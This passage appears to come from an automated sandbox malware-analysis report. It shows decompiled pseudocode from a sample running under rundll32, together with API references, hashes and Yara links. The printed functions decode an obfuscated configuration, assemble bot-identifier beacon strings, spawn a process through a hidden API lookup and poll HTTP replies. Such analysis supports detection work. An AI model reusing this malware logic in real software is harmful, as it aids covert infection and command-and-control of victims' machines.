						_t49 = E045E2A59(_t104, _t102, _t82 ^ 0x3cd8b2cb);
					}
					if(_t49 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t49, 0,  &_v8) != 0) {
							 *0x45ea02c = _v8;
						}
					}
					if(_t102 == 0) {
						_t50 = 0;
					} else {
						_t78 =  *0x45ea344; // 0x69b25f44
						_t50 = E045E2A59(_t104, _t102, _t78 ^ 0x2878b929);
					}
					if(_t50 == 0) {
						L41:
						 *0x45ea2ec = 5;
						goto L42;
					} else {
						_t104 =  &_v8;
						if(StrToIntExA(_t50, 0,  &_v8) == 0 || _v8 == 0) {
							goto L41;
						} else {
							L42:
							if(_t102 == 0) {
								_t51 = 0;
							} else {
								_t75 =  *0x45ea344; // 0x69b25f44
								_t51 = E045E2A59(_t104, _t102, _t75 ^ 0x261a367a);
							}
							if(_t51 != 0) {
								_push(_t51);
								_t72 = 0x10;
								_t73 = E045E18F5(_t72);
								if(_t73 != 0) {
									_push(_t73);
									E045E731D();
								}
							}
							if(_t102 == 0) {
								_t52 = 0;
							} else {
								_t70 =  *0x45ea344; // 0x69b25f44
								_t52 = E045E2A59(_t104, _t102, _t70 ^ 0xb9d404b2);
							}
							if(_t52 != 0 && E045E18F5(0, _t52) != 0) {
								_t121 =  *0x45ea3cc; // 0x4ff9600
								E045E3D80(_t121 + 4, _t68);
							}
							if(_t102 == 0) {
								_t53 = 0;
							} else {
								_t65 =  *0x45ea344; // 0x69b25f44
								_t53 = E045E2A59(_t104, _t102, _t65 ^ 0x3df17130);
							}
							if(_t53 == 0) {
								L59:
								_t54 =  *0x45ea348; // 0xa0d5a8
								_t22 = _t54 + 0x45eb252; // 0x616d692f
								 *0x45ea370 = _t22;
								goto L60;
							} else {
								_t64 = E045E18F5(0, _t53);
								 *0x45ea370 = _t64;
								if(_t64 != 0) {
									L60:
									if(_t102 == 0) {
										_t56 = 0;
									} else {
										_t61 =  *0x45ea344; // 0x69b25f44
										_t56 = E045E2A59(_t104, _t102, _t61 ^ 0xd2079859);
									}
									if(_t56 == 0) {
										_t57 =  *0x45ea348; // 0xa0d5a8
										_t23 = _t57 + 0x45eb79e; // 0x6976612e
										_t58 = _t23;
									} else {
										_t58 = E045E18F5(0, _t56);
									}
									 *0x45ea3e0 = _t58;
									HeapFree( *0x45ea2d8, 0, _t102);
									_v12 = 0;
									goto L67;
								}
								goto L59;
							}
						}
					}
				}
			}

0x045e2792
0x045e2792
0x045e2792
0x045e2792
0x045e2795
0x045e27b2
0x045e27c0
0x045e27c0
0x045e27c5
0x045e27df
0x045e2a4d
0x045e2a54
0x045e2a58
0x045e2a58
0x045e27e5
0x045e27ea
0x045e2802
0x045e2a3a
0x045e2a44
0x00000000
0x045e2808
0x045e2808
0x045e2809
0x045e280e
0x045e2824
0x045e2810
0x045e2810
0x045e281d
0x045e281d
0x045e2826
0x045e282f
0x045e2831
0x045e283b
0x045e2840
0x045e2840
0x045e283b
0x045e2847
0x045e285d
0x045e2849
0x045e2849
0x045e2856
0x045e2856
0x045e2861
0x045e2863
0x045e286d
0x045e2872
0x045e2872
0x045e286d
0x045e2879
0x045e288f
0x045e287b
0x045e287b
0x045e2888
0x045e2888
0x045e2893
0x045e2895
0x045e289f
0x045e28a4
0x045e28a4
0x045e289f
0x045e28ab
0x045e28c1
0x045e28ad
0x045e28ad
0x045e28ba
0x045e28ba
0x045e28c5
0x045e28c7
0x045e28d1
0x045e28d6
0x045e28d6
0x045e28d1
0x045e28dd
0x045e28f3
0x045e28df
0x045e28df
0x045e28ec
0x045e28ec
0x045e28f7
0x045e28f9
0x045e2903
0x045e2908
0x045e2908
0x045e2903
0x045e290f
0x045e2925
0x045e2911
0x045e2911
0x045e291e
0x045e291e
0x045e2929
0x045e293c
0x045e293c
0x00000000
0x045e292b
0x045e292b
0x045e2935
0x00000000
0x045e2946
0x045e2946
0x045e2948
0x045e295e
0x045e294a
0x045e294a
0x045e2957
0x045e2957
0x045e2962
0x045e2964
0x045e2967
0x045e2968
0x045e296f
0x045e2971
0x045e2972
0x045e2972
0x045e296f
0x045e2979
0x045e298f
0x045e297b
0x045e297b
0x045e2988
0x045e2988
0x045e2993
0x045e29a1
0x045e29ab
0x045e29ab
0x045e29b3
0x045e29c9
0x045e29b5
0x045e29b5
0x045e29c2
0x045e29c2
0x045e29cd
0x045e29e0
0x045e29e0
0x045e29e5
0x045e29eb
0x00000000
0x045e29cf
0x045e29d2
0x045e29d7
0x045e29de
0x045e29f0
0x045e29f2
0x045e2a08
0x045e29f4
0x045e29f4
0x045e2a01
0x045e2a01
0x045e2a0c
0x045e2a18
0x045e2a1d
0x045e2a1d
0x045e2a0e
0x045e2a11
0x045e2a11
0x045e2a2b
0x045e2a30
0x045e2a36
0x00000000
0x045e2a39
0x00000000
0x045e29de
0x045e29cd
0x045e2935
0x045e2929

APIs

StrToIntExA.SHLWAPI(00000000,00000000,?,045EA00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 045E2837
StrToIntExA.SHLWAPI(00000000,00000000,?,045EA00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 045E2869
StrToIntExA.SHLWAPI(00000000,00000000,?,045EA00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 045E289B
StrToIntExA.SHLWAPI(00000000,00000000,?,045EA00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 045E28CD
StrToIntExA.SHLWAPI(00000000,00000000,?,045EA00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 045E28FF
StrToIntExA.SHLWAPI(00000000,00000000,?,045EA00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 045E2931
HeapFree.KERNEL32(00000000,?,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?,?), ref: 045E2A30
HeapFree.KERNEL32(00000000,?,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?,?), ref: 045E2A44

Strings

Uqt, xrefs: 045E2A30, 045E2A44

Memory Dump Source

Source File: 00000005.00000002.817270841.00000000045E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 045E0000, based on PE: true

Associated: 00000005.00000002.817255326.00000000045E0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000005.00000002.817297629.00000000045E9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000005.00000002.817312621.00000000045EA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000005.00000002.817323736.00000000045EC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_45e0000_rundll32.jbxd

Similarity

API ID: FreeHeap
String ID: Uqt
API String ID: 3298025750-2320327147
Opcode ID: 045cec8ca0b95c1ba05ad8a8bd097a37534cf815420f6d7710eb4317c6b215c8
Instruction ID: 9686ebd796d89e1e7576a8d0290ff8848ab35e34cc47174000b8d5a66816cc57
Opcode Fuzzy Hash: 045cec8ca0b95c1ba05ad8a8bd097a37534cf815420f6d7710eb4317c6b215c8
Instruction Fuzzy Hash: 1C819171B00205ABD729DBB7E98497F77ADBB8C600B2419A5B001DB108E679FD49BB60

Uniqueness

Uniqueness Score: -1.00%

Function 045E6CA4 Relevance: 45.8, APIs: 25, Strings: 1, Instructions: 278
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E045E6CA4(long __eax, intOrPtr _a4, void* _a8, void* _a16, void* _a20, void* _a24, intOrPtr _a32, void* _a40, intOrPtr _a44) {
				intOrPtr _v4;
				signed int _v8;
				int* _v12;
				char* _v16;
				intOrPtr _v20;
				void* _v24;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _v40;
				void* __ebx;
				void* __edi;
				long _t68;
				intOrPtr _t69;
				intOrPtr _t70;
				intOrPtr _t71;
				intOrPtr _t72;
				intOrPtr _t73;
				void* _t76;
				intOrPtr _t77;
				int _t80;
				intOrPtr _t81;
				intOrPtr _t85;
				intOrPtr _t86;
				intOrPtr _t87;
				void* _t89;
				void* _t92;
				intOrPtr _t96;
				intOrPtr _t100;
				intOrPtr* _t102;
				int* _t108;
				int* _t118;
				char** _t120;
				char* _t121;
				intOrPtr* _t126;
				intOrPtr* _t128;
				intOrPtr* _t130;
				intOrPtr* _t132;
				intOrPtr _t135;
				intOrPtr _t139;
				int _t142;
				intOrPtr _t144;
				int _t147;
				intOrPtr _t148;
				int _t151;
				void* _t152;
				intOrPtr _t166;
				void* _t168;
				int _t169;
				void* _t170;
				void* _t171;
				long _t172;
				intOrPtr* _t173;
				intOrPtr* _t174;
				intOrPtr _t175;
				intOrPtr* _t178;
				char** _t181;
				char** _t183;
				char** _t184;
				void* _t189;

				_t68 = __eax;
				_t181 =  &_v16;
				_t152 = _a20;
				_a20 = 8;
				if(__eax == 0) {
					_t68 = GetTickCount();
				}
				_t69 =  *0x45ea018; // 0xe8f22e63
				asm("bswap eax");
				_t70 =  *0x45ea014; // 0x3a87c8cd
				asm("bswap eax");
				_t71 =  *0x45ea010; // 0xd8d2f808
				asm("bswap eax");
				_t72 = E045EA00C; // 0x81762942
				asm("bswap eax");
				_t73 =  *0x45ea348; // 0xa0d5a8
				_t3 = _t73 + 0x45eb62b; // 0x74666f73
				_t169 = wsprintfA(_t152, _t3, 3, 0x3d186, _t72, _t71, _t70, _t69,  *0x45ea02c,  *0x45ea004, _t68);
				_t76 = E045E1308();
				_t77 =  *0x45ea348; // 0xa0d5a8
				_t4 = _t77 + 0x45eb66b; // 0x74707526
				_t80 = wsprintfA(_t169 + _t152, _t4, _t76);
				_t183 =  &(_t181[0xe]);
				_t170 = _t169 + _t80;
				if(_a24 != 0) {
					_t148 =  *0x45ea348; // 0xa0d5a8
					_t8 = _t148 + 0x45eb676; // 0x732526
					_t151 = wsprintfA(_t170 + _t152, _t8, _a24);
					_t183 =  &(_t183[3]);
					_t170 = _t170 + _t151;
				}
				_t81 =  *0x45ea348; // 0xa0d5a8
				_t10 = _t81 + 0x45eb78e; // 0x4ff8d36
				_t153 = _t10;
				_t189 = _a20 - _t10;
				_t12 = _t81 + 0x45eb2de; // 0x74636126
				_t164 = 0 | _t189 == 0x00000000;
				_t171 = _t170 + wsprintfA(_t170 + _t152, _t12, _t189 == 0);
				_t85 =  *0x45ea36c; // 0x4ff95b0
				_t184 =  &(_t183[3]);
				if(_t85 != 0) {
					_t144 =  *0x45ea348; // 0xa0d5a8
					_t16 = _t144 + 0x45eb889; // 0x3d736f26
					_t147 = wsprintfA(_t171 + _t152, _t16, _t85);
					_t184 =  &(_t184[3]);
					_t171 = _t171 + _t147;
				}
				_t86 = E045E3DE0(_t153);
				_a32 = _t86;
				if(_t86 != 0) {
					_t139 =  *0x45ea348; // 0xa0d5a8
					_t19 = _t139 + 0x45eb8c2; // 0x736e6426
					_t142 = wsprintfA(_t171 + _t152, _t19, _t86);
					_t184 =  &(_t184[3]);
					_t171 = _t171 + _t142;
					HeapFree( *0x45ea2d8, 0, _a40);
				}
				_t87 = E045E3ACA();
				_a32 = _t87;
				if(_t87 != 0) {
					_t135 =  *0x45ea348; // 0xa0d5a8
					_t23 = _t135 + 0x45eb8ca; // 0x6f687726
					wsprintfA(_t171 + _t152, _t23, _t87);
					_t184 =  &(_t184[3]);
					HeapFree( *0x45ea2d8, 0, _a40);
				}
				_t166 =  *0x45ea3cc; // 0x4ff9600
				_t89 = E045E4B69(0x45ea00a, _t166 + 4);
				_t172 = 0;
				_a16 = _t89;
				if(_t89 == 0) {
					L30:
					HeapFree( *0x45ea2d8, _t172, _t152);
					return _a44;
				} else {
					_t92 = RtlAllocateHeap( *0x45ea2d8, 0, 0x800);
					_a24 = _t92;
					if(_t92 == 0) {
						L29:
						HeapFree( *0x45ea2d8, _t172, _a8);
						goto L30;
					}
					E045E53AE(GetTickCount());
					_t96 =  *0x45ea3cc; // 0x4ff9600
					__imp__(_t96 + 0x40);
					asm("lock xadd [eax], ecx");
					_t100 =  *0x45ea3cc; // 0x4ff9600
					__imp__(_t100 + 0x40);
					_t102 =  *0x45ea3cc; // 0x4ff9600
					_t168 = E045E2281(1, _t164, _t152,  *_t102);
					asm("lock xadd [eax], ecx");
					if(_t168 == 0) {
						L28:
						HeapFree( *0x45ea2d8, _t172, _a16);
						goto L29;
					}
					StrTrimA(_t168, 0x45e9280);
					_push(_t168);
					_t108 = E045E6311();
					_v12 = _t108;
					if(_t108 == 0) {
						L27:
						HeapFree( *0x45ea2d8, _t172, _t168);
						goto L28;
					}
					_t173 = __imp__;
					 *_t173(_t168, _a8);
					 *_t173(_a4, _v12);
					_t174 = __imp__;
					 *_t174(_v4, _v24);
					_t175 = E045E3D2E( *_t174(_v12, _t168), _v20);
					_v36 = _t175;
					if(_t175 == 0) {
						_v8 = 8;
						L25:
						E045E14C6();
						L26:
						HeapFree( *0x45ea2d8, 0, _v40);
						_t172 = 0;
						goto L27;
					}
					_t118 = E045E7446(_t152, 0xffffffffffffffff, _t168,  &_v24);
					_v12 = _t118;
					if(_t118 == 0) {
						_t178 = _v24;
						_v20 = E045E1335(_t178, _t175, _v16, _v12);
						_t126 =  *((intOrPtr*)(_t178 + 8));
						 *((intOrPtr*)( *_t126 + 0x80))(_t126);
						_t128 =  *((intOrPtr*)(_t178 + 8));
						 *((intOrPtr*)( *_t128 + 8))(_t128);
						_t130 =  *((intOrPtr*)(_t178 + 4));
						 *((intOrPtr*)( *_t130 + 8))(_t130);
						_t132 =  *_t178;
						 *((intOrPtr*)( *_t132 + 8))(_t132);
						E045E789E(_t178);
					}
					if(_v8 != 0x10d2) {
						L20:
						if(_v8 == 0) {
							_t120 = _v16;
							if(_t120 != 0) {
								_t121 =  *_t120;
								_t176 =  *_v12;
								_v16 = _t121;
								wcstombs(_t121, _t121,  *_v12);
								 *_v24 = E045E5F92(_v16, _v16, _t176 >> 1);
							}
						}
						goto L23;
					} else {
						if(_v16 != 0) {
							L23:
							E045E789E(_v32);
							if(_v12 == 0 || _v8 == 0x10d2) {
								goto L26;
							} else {
								goto L25;
							}
						}
						_v8 = _v8 & 0x00000000;
						goto L20;
					}
				}
			}

0x045e6ca4
0x045e6ca4
0x045e6ca8
0x045e6caf
0x045e6cb9
0x045e6cbb
0x045e6cbb
0x045e6cc8
0x045e6cd3
0x045e6cd6
0x045e6ce1
0x045e6ce4
0x045e6ce9
0x045e6cec
0x045e6cf1
0x045e6cf4
0x045e6d00
0x045e6d0d
0x045e6d0f
0x045e6d15
0x045e6d1a
0x045e6d25
0x045e6d27
0x045e6d2a
0x045e6d31
0x045e6d33
0x045e6d3c
0x045e6d47
0x045e6d49
0x045e6d4c
0x045e6d4c
0x045e6d4e
0x045e6d53
0x045e6d53
0x045e6d5b
0x045e6d5f
0x045e6d65
0x045e6d70
0x045e6d72
0x045e6d77
0x045e6d7c
0x045e6d7f
0x045e6d84
0x045e6d8f
0x045e6d91
0x045e6d94
0x045e6d94
0x045e6d96
0x045e6da1
0x045e6da7
0x045e6daa
0x045e6daf
0x045e6dba
0x045e6dbc
0x045e6dc3
0x045e6dcd
0x045e6dcd
0x045e6dcf
0x045e6dd4
0x045e6dda
0x045e6ddd
0x045e6de2
0x045e6dec
0x045e6dee
0x045e6dfd
0x045e6dfd
0x045e6dff
0x045e6e0d
0x045e6e12
0x045e6e14
0x045e6e1a
0x045e6ffa
0x045e7002
0x045e700f
0x045e6e20
0x045e6e2c
0x045e6e32
0x045e6e38
0x045e6fed
0x045e6ff8
0x00000000
0x045e6ff8
0x045e6e44
0x045e6e49
0x045e6e52
0x045e6e63
0x045e6e67
0x045e6e70
0x045e6e76
0x045e6e83
0x045e6e90
0x045e6e96
0x045e6fe0
0x045e6feb
0x00000000
0x045e6feb
0x045e6ea2
0x045e6ea8
0x045e6ea9
0x045e6eae
0x045e6eb4
0x045e6fd6
0x045e6fde
0x00000000
0x045e6fde
0x045e6ebe
0x045e6ec5
0x045e6ecf
0x045e6ed5
0x045e6edf
0x045e6ef1
0x045e6ef3
0x045e6ef9
0x045e7012
0x045e6fc1
0x045e6fc1
0x045e6fc6
0x045e6fd2
0x045e6fd4
0x00000000
0x045e6fd4
0x045e6f04
0x045e6f09
0x045e6f0f
0x045e6f1a
0x045e6f25
0x045e6f29
0x045e6f2f
0x045e6f35
0x045e6f3b
0x045e6f3e
0x045e6f44
0x045e6f47
0x045e6f4c
0x045e6f50
0x045e6f50
0x045e6f5d
0x045e6f6b
0x045e6f70
0x045e6f72
0x045e6f78
0x045e6f7e
0x045e6f80
0x045e6f85
0x045e6f89
0x045e6fa5
0x045e6fa5
0x045e6f78
0x00000000
0x045e6f5f
0x045e6f64
0x045e6fa7
0x045e6fab
0x045e6fb5
0x00000000
0x00000000
0x00000000
0x00000000
0x045e6fb5
0x045e6f66
0x00000000
0x045e6f66
0x045e6f5d

APIs

GetTickCount.KERNEL32 ref: 045E6CBB
wsprintfA.USER32 ref: 045E6D08
wsprintfA.USER32 ref: 045E6D25
wsprintfA.USER32 ref: 045E6D47
wsprintfA.USER32 ref: 045E6D6E
wsprintfA.USER32 ref: 045E6D8F
wsprintfA.USER32 ref: 045E6DBA
HeapFree.KERNEL32(00000000,?), ref: 045E6DCD
wsprintfA.USER32 ref: 045E6DEC
HeapFree.KERNEL32(00000000,?), ref: 045E6DFD

Part of subcall function 045E4B69: RtlEnterCriticalSection.NTDLL(04FF95C0), ref: 045E4B85
Part of subcall function 045E4B69: RtlLeaveCriticalSection.NTDLL(04FF95C0), ref: 045E4BA3

RtlAllocateHeap.NTDLL(00000000,00000800), ref: 045E6E2C
GetTickCount.KERNEL32 ref: 045E6E3E
RtlEnterCriticalSection.NTDLL(04FF95C0), ref: 045E6E52
RtlLeaveCriticalSection.NTDLL(04FF95C0), ref: 045E6E70

Part of subcall function 045E2281: lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,775EC740,045E3831,00000000,04FF9600), ref: 045E22AC
Part of subcall function 045E2281: lstrlen.KERNEL32(00000000,?,775EC740,045E3831,00000000,04FF9600), ref: 045E22B4
Part of subcall function 045E2281: strcpy.NTDLL ref: 045E22CB
Part of subcall function 045E2281: lstrcat.KERNEL32(00000000,00000000), ref: 045E22D6
Part of subcall function 045E2281: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,045E3831,?,775EC740,045E3831,00000000,04FF9600), ref: 045E22F3

StrTrimA.SHLWAPI(00000000,045E9280,?,04FF9600), ref: 045E6EA2

Part of subcall function 045E6311: lstrlen.KERNEL32(04FF9BB8,00000000,00000000,00000000,045E385C,00000000), ref: 045E6321
Part of subcall function 045E6311: lstrlen.KERNEL32(?), ref: 045E6329
Part of subcall function 045E6311: lstrcpy.KERNEL32(00000000,04FF9BB8), ref: 045E633D
Part of subcall function 045E6311: lstrcat.KERNEL32(00000000,?), ref: 045E6348

lstrcpy.KERNEL32(00000000,?), ref: 045E6EC5
lstrcpy.KERNEL32(?,?), ref: 045E6ECF
lstrcat.KERNEL32(?,?), ref: 045E6EDF
lstrcat.KERNEL32(?,00000000), ref: 045E6EE6

Part of subcall function 045E3D2E: lstrlen.KERNEL32(?,00000000,04FF9DC0,00000000,045E695F,04FF9FE3,69B25F44,?,?,?,?,69B25F44,00000005,045EA00C,4D283A53,?), ref: 045E3D35
Part of subcall function 045E3D2E: mbstowcs.NTDLL ref: 045E3D5E
Part of subcall function 045E3D2E: memset.NTDLL ref: 045E3D70

wcstombs.NTDLL ref: 045E6F89

Part of subcall function 045E1335: SysAllocString.OLEAUT32(?), ref: 045E1370

Part of subcall function 045E789E: RtlFreeHeap.NTDLL(00000000,00000000,045E4E3E,00000000,?,00000000,00000000), ref: 045E78AA

HeapFree.KERNEL32(00000000,?), ref: 045E6FD2
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 045E6FDE
HeapFree.KERNEL32(00000000,?,?,04FF9600), ref: 045E6FEB
HeapFree.KERNEL32(00000000,?), ref: 045E6FF8
HeapFree.KERNEL32(00000000,?), ref: 045E7002

Strings

Uqt, xrefs: 045E6D9B

Memory Dump Source

Source File: 00000005.00000002.817270841.00000000045E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 045E0000, based on PE: true

Associated: 00000005.00000002.817255326.00000000045E0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000005.00000002.817297629.00000000045E9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000005.00000002.817312621.00000000045EA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000005.00000002.817323736.00000000045EC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_45e0000_rundll32.jbxd

Similarity

API ID: Heap$Free$wsprintf$lstrlen$CriticalSectionlstrcat$lstrcpy$CountEnterLeaveTickTrim$AllocAllocateStringmbstowcsmemsetstrcpywcstombs
String ID: Uqt
API String ID: 1185349883-2320327147
Opcode ID: 88d3acbb2a0ceda11ea01f514915575d9b4fb9fa989326eb330bc3a505954d7c
Instruction ID: 61479e3732407aff2236db72e410343481ffa9838a5236a4086d15e3f5192be2
Opcode Fuzzy Hash: 88d3acbb2a0ceda11ea01f514915575d9b4fb9fa989326eb330bc3a505954d7c
Instruction Fuzzy Hash: DFA19BB1900311AFD719EF66DC84E6A7BE8FF88354F440928F448DB220D635EC49EB62

Uniqueness

Uniqueness Score: -1.00%

Function 045E3BF0 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 109
librarymemoryloaderCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E045E3BF0(void* __eax, void* __ecx) {
				long _v8;
				char _v12;
				void* _v16;
				void* _v28;
				long _v32;
				void _v104;
				char _v108;
				long _t36;
				intOrPtr _t40;
				intOrPtr _t47;
				intOrPtr _t50;
				void* _t58;
				void* _t68;
				intOrPtr* _t70;
				intOrPtr* _t71;

				_t1 = __eax + 0x14; // 0x74183966
				_t69 =  *_t1;
				_t36 = E045E2AA6(__ecx,  *((intOrPtr*)( *_t1 + 0xc)),  &_v12,  &_v16);
				_v8 = _t36;
				if(_t36 != 0) {
					L12:
					return _v8;
				}
				E045E7A86( *((intOrPtr*)(_t69 + 0xc)),  *((intOrPtr*)(_t69 + 8)), _v12);
				_t40 = _v12(_v12);
				_v8 = _t40;
				if(_t40 == 0 && ( *0x45ea300 & 0x00000001) != 0) {
					_v32 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v108 = 0;
					memset( &_v104, 0, 0x40);
					_t47 =  *0x45ea348; // 0xa0d5a8
					_t18 = _t47 + 0x45eb3f3; // 0x73797325
					_t68 = E045E3A12(_t18);
					if(_t68 == 0) {
						_v8 = 8;
					} else {
						_t50 =  *0x45ea348; // 0xa0d5a8
						_t19 = _t50 + 0x45eb73f; // 0x4ff8ce7
						_t20 = _t50 + 0x45eb0af; // 0x4e52454b
						_t71 = GetProcAddress(GetModuleHandleA(_t20), _t19);
						if(_t71 == 0) {
							_v8 = 0x7f;
						} else {
							_v108 = 0x44;
							E045E2058();
							_t58 =  *_t71(0, _t68, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32, 0);
							_push(1);
							E045E2058();
							if(_t58 == 0) {
								_v8 = GetLastError();
							} else {
								CloseHandle(_v28);
								CloseHandle(_v32);
							}
						}
						HeapFree( *0x45ea2d8, 0, _t68);
					}
				}
				_t70 = _v16;
				 *((intOrPtr*)(_t70 + 0x18))( *((intOrPtr*)(_t70 + 0x1c))( *_t70));
				E045E789E(_t70);
				goto L12;
			}

0x045e3bf8
0x045e3bf8
0x045e3c07
0x045e3c0e
0x045e3c13
0x045e3d20
0x045e3d27
0x045e3d27
0x045e3c22
0x045e3c2a
0x045e3c2d
0x045e3c32
0x045e3c47
0x045e3c4d
0x045e3c4e
0x045e3c51
0x045e3c57
0x045e3c5a
0x045e3c5f
0x045e3c67
0x045e3c73
0x045e3c77
0x045e3d07
0x045e3c7d
0x045e3c7d
0x045e3c82
0x045e3c89
0x045e3c9d
0x045e3ca1
0x045e3cf0
0x045e3ca3
0x045e3ca4
0x045e3cab
0x045e3cc4
0x045e3cc6
0x045e3cca
0x045e3cd1
0x045e3ceb
0x045e3cd3
0x045e3cdc
0x045e3ce1
0x045e3ce1
0x045e3cd1
0x045e3cff
0x045e3cff
0x045e3c77
0x045e3d0e
0x045e3d17
0x045e3d1b
0x00000000

APIs

Part of subcall function 045E2AA6: GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,045E3C0C,?,?,?,?,00000000,00000000), ref: 045E2ACB
Part of subcall function 045E2AA6: GetProcAddress.KERNEL32(00000000,7243775A), ref: 045E2AED
Part of subcall function 045E2AA6: GetProcAddress.KERNEL32(00000000,614D775A), ref: 045E2B03
Part of subcall function 045E2AA6: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 045E2B19
Part of subcall function 045E2AA6: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 045E2B2F
Part of subcall function 045E2AA6: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 045E2B45

memset.NTDLL ref: 045E3C5A

Part of subcall function 045E3A12: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,74183966,00000000,045E3C73,73797325), ref: 045E3A23
Part of subcall function 045E3A12: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 045E3A3D

GetModuleHandleA.KERNEL32(4E52454B,04FF8CE7,73797325), ref: 045E3C90
GetProcAddress.KERNEL32(00000000), ref: 045E3C97
HeapFree.KERNEL32(00000000,00000000), ref: 045E3CFF

Part of subcall function 045E2058: GetProcAddress.KERNEL32(36776F57,045E58B5), ref: 045E2073

CloseHandle.KERNEL32(00000000,00000001), ref: 045E3CDC
CloseHandle.KERNEL32(?), ref: 045E3CE1
GetLastError.KERNEL32(00000001), ref: 045E3CE5

Strings

@MqtNqt, xrefs: 045E3CE5
Uqt, xrefs: 045E3CFF

Memory Dump Source

Source File: 00000005.00000002.817270841.00000000045E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 045E0000, based on PE: true

Associated: 00000005.00000002.817255326.00000000045E0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000005.00000002.817297629.00000000045E9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000005.00000002.817312621.00000000045EA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000005.00000002.817323736.00000000045EC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_45e0000_rundll32.jbxd

Similarity

API ID: AddressProc$Handle$CloseEnvironmentExpandModuleStrings$ErrorFreeHeapLastmemset
String ID: Uqt$@MqtNqt
API String ID: 3075724336-3266969629
Opcode ID: 069acd5cd9d2cd60a71322516d4887256b12322cd688a085aec6780efef344d9
Instruction ID: 331360330769787c49afebc480e5aba6a488bef5bea0cd94f57addf080226e6d
Opcode Fuzzy Hash: 069acd5cd9d2cd60a71322516d4887256b12322cd688a085aec6780efef344d9
Instruction Fuzzy Hash: 60314FB2800219BFDB14EFA6D888DAEBBBCFB48344F004465E945A7110D735AE48EB50

Uniqueness

Uniqueness Score: -1.00%

Function 045E4E4D Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 92
networksynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E045E4E4D(void* __ecx, void* __esi) {
				long _v8;
				long _v12;
				long _v16;
				long _v20;
				long _t34;
				long _t39;
				long _t42;
				long _t56;
				void* _t58;
				void* _t59;
				void* _t61;

				_t61 = __esi;
				_t59 = __ecx;
				 *((intOrPtr*)(__esi + 0x2c)) = 0;
				do {
					_t34 = WaitForSingleObject( *(_t61 + 0x1c), 0);
					_v20 = _t34;
					if(_t34 != 0) {
						L3:
						_v8 = 4;
						_v16 = 0;
						if(HttpQueryInfoA( *(_t61 + 0x18), 0x20000013, _t61 + 0x2c,  &_v8,  &_v16) == 0) {
							_t39 = GetLastError();
							_v12 = _t39;
							if(_v20 == 0 || _t39 != 0x2ef3) {
								L15:
								return _v12;
							} else {
								goto L11;
							}
						}
						if(_v8 != 4 ||  *(_t61 + 0x2c) == 0) {
							goto L11;
						} else {
							_v16 = 0;
							_v8 = 0;
							HttpQueryInfoA( *(_t61 + 0x18), 0x16, 0,  &_v8,  &_v16);
							_t58 = E045E7A71(_v8 + 1);
							if(_t58 == 0) {
								_v12 = 8;
							} else {
								if(HttpQueryInfoA( *(_t61 + 0x18), 0x16, _t58,  &_v8,  &_v16) == 0) {
									E045E789E(_t58);
									_v12 = GetLastError();
								} else {
									 *((char*)(_t58 + _v8)) = 0;
									 *(_t61 + 0xc) = _t58;
								}
							}
							goto L15;
						}
					}
					SetEvent( *(_t61 + 0x1c));
					_t56 =  *((intOrPtr*)(_t61 + 0x28));
					_v12 = _t56;
					if(_t56 != 0) {
						goto L15;
					}
					goto L3;
					L11:
					_t42 = E045E2129( *(_t61 + 0x1c), _t59, 0xea60);
					_v12 = _t42;
				} while (_t42 == 0);
				goto L15;
			}

0x045e4e4d
0x045e4e4d
0x045e4e5d
0x045e4e60
0x045e4e64
0x045e4e6a
0x045e4e6f
0x045e4e88
0x045e4e9c
0x045e4ea3
0x045e4eaa
0x045e4efd
0x045e4f03
0x045e4f09
0x045e4f44
0x045e4f4a
0x00000000
0x00000000
0x00000000
0x045e4f09
0x045e4eb0
0x00000000
0x045e4eb7
0x045e4ec5
0x045e4ec8
0x045e4ecb
0x045e4ed7
0x045e4edb
0x045e4f3d
0x045e4edd
0x045e4eef
0x045e4f2d
0x045e4f38
0x045e4ef1
0x045e4ef4
0x045e4ef8
0x045e4ef8
